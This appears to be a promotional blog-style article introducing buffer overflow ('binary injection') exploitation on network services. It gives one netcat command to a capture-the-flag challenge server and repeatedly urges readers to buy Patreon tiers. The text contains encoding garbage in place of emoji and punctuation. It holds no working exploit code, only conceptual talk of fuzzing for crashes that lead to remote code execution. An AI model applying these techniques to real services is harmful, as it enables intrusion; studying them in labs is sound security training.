Futaba _ Webs πΈπΈππΈπΈ
Buffer Overflow 64 bit πΈπΈππΈπΈ
Todayβs exploit video will feature something that has been HEAVILY requested by many of my followersβ¦ BINARY injection, also known commonly as a Buffer Overflow exploit.
π Article π Glossary π Catalog π Home π Search Modeπ Article Glossary
πΈ Synopsis πΈ
Todayβs exploit video will feature something that has been HEAVILY requested by many of my followersβ¦ BINARY injection, also known commonly as a Buffer Overflow exploit.
πΈ Article Topics πΈ
I'll be discussing the following topics in order: π Premise π What is Binary injection? You can click on any of the topics to simply check that one out if it interests you! NOTE: Articles are read from LEFT to RIGHT via 2 columns! Read the first column all the way down and then move to the next one!
πΈ Key Links πΈ
Here's a quick run down on all the main links that are in the article in case you want to check them out first. π LinkedIn Version π Patreon Version
π RCE Binary Injection
Premise πΈπΈππΈπΈ
Much like how SQL injection is hard to learn without proper instruction, so is binary injection. What Iβm going to show you today is the overall premise and concept behind the technique. This is the DEFINITIVE example and BEST way to EASILY explain how binary injection works to ANYONE that wants to learn more about it.
Binary is overall one of the HARDEST techniques to learn and master mostly due to there being FEW GOOD resources that can teach it to you.
Iβm also going to write some sample code in C that will be vulnerable to buffer overflow attacks, so that you can play with it and get a feel for how it works on a technical level. This will also set us up for the next part, which will be me covering how to use a debugger to analyze the code flow, as well as perform the overall exploit the manual way. There are more special surprises for binary injection coming up so do stay tuned.
As always, any and all videos that are included with this article will be for PAID members only! You can check out my tiers and pricing down in my patreon link in the comment section below as well as on my website.
What is Binary injection? πΈπΈππΈπΈ
There are situations where web application servers will have a program with a service running binded to a port. When you connect to it, the program will run. In some cases, youβll run into a situation where the program will ask you for user input, which is a common thing. You can fuzz it like how I showed you in previous examples to trigger a segmentation fault which can result in you landing RCE against the server side application, potentially a lot more if you can secure the source code for the application.
To give you a better example of what I mean, run the following command nc canyouhack.us 1985.
THIS IS A CHALLENGE IS FROM βSECURITY INNOVATIONβ THAT HOSTS THE βCANYOUHACK.USβ CHALLENGE WHICH HOSTS A BINARY EXPLOITATION SERVER LEGAL FOR TESTING. YOU CAN LOOK THIS UP BEFORE YOU RUN THE COMMAND
Next, if you run some input youβll notice it will close. You canβt see the end user output from the command due to security, BUT, they leave you the source code for the challenge when you go to it, which you can test against. There are vulnerable sections in the code where you can exploit it to send you the flag to solve the challenge. You have to pipe it over the nc command which you can do with certain tools of course.
If you like to see the more advanced version of this article that talks about methods that can be used to mitigate, as well as any videos included, SUBSCRIBE TO MY PATREON CYBER SECURITY TIER!
If you enjoyed this post give it a thumbs up! Iβll be keeping track of whose reacting from now on as there is a βspecialβ reason for it. Just know the more you support my content the more there is in stored!
- The Hacker Who Laughs πΈπΈππΈπΈ
